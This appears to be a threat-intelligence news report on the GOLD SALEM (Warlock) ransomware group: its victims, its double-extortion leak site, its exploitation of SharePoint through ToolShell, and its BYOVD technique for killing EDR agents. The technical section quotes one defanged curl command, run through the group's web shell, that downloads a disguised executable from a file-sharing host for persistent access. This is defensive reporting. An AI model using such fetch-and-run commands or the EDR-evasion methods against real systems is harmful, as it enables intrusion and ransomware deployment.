“`html
The cyber threat environment has seen the rise of another advanced ransomware operation, as GOLD SALEM, a recently identified hacker group also referred to as the Warlock Group, has been actively infiltrating corporate networks since March 2025.
This new ransomware coalition has effectively struck 60 organizations across North America, Europe, and South America, showcasing adept proficiency while implementing their bespoke Warlock ransomware payload.
Microsoft has categorized this group as Storm-2603 and posits with moderate assurance that it functions from China, although attribution remains uncertain.
GOLD SALEM has strategically positioned itself within the competitive ransomware landscape by targeting a diverse array of victims, ranging from small businesses to large multinational enterprises.
The group functions through a complex double-extortion model, utilizing a Tor-based data leak platform to disclose stolen victim information when ransom demands are not met.
Their victim selection appears deliberate, mostly steering clear of targets in China and Russia; however, they notably listed a Russian power generation service company in September 2025, suggesting possible operations from beyond conventional ransomware refuges.
The threat actors made their initial public impression through underground forums in June 2025, posting on the RAMP forum to seek exploits for enterprise applications such as Veeam, ESXi, and SharePoint, while requesting tools to disable endpoint detection and response mechanisms.
Sophos analysts recognized the group’s advanced operational security practices and noted their recruitment efforts for initial access brokers, suggesting a capability for direct intrusion or the establishment of a ransomware-as-a-service model.
The operational structure of GOLD SALEM displays meticulous planning and technical sophistication.
The group maintains countdown clocks for each victim, typically allowing 12-14 days for ransom payment prior to data publication.
As of September 2025, they assert to have sold data from 45% of their victims to private buyers, although these numbers may be exaggerated for psychological effect.
.webp)
The group’s data leak site showcases a professional design and victim categorization, indicating their dedication to operational professionalism.
Advanced Evasion Techniques and Security Bypass Methods
The technical evaluation reveals GOLD SALEM’s sophisticated technique regarding the circumvention of security measures and sustained network access.
The group utilizes the ToolShell exploit chain that targets SharePoint servers for initial network infiltration, capitalizing on a combination of critical vulnerabilities including CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771.
Upon successful exploitation, they implement an ASPX web shell that generates Process objects for cmd[.]exe within the context of the IIS worker process, permitting remote command execution with visible output.
A notably distinct method observed consists of their command execution via the web shell:
curl - L - o c:userspublicSophosSophos-UI[.]exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks[.]exe[.]txtThis command retrieves a Golang-based WebSockets server, establishing continuous access independent of the initial web shell.
The group exhibits advanced evasion tactics through Bring Your Own Vulnerable Driver (BYOVD) techniques, employing a renamed vulnerable Baidu Antivirus driver (googleApiUtil64.sys) to exploit CVE-2024-51324 for indiscriminate process termination, specifically focused on EDR agents.
Their toolkit features Mimikatz for credential extraction from LSASS memory, PsExec and Impacket for lateral movement, and manipulation of Group Policy Objects for ransomware deployment throughout network endpoints.
“`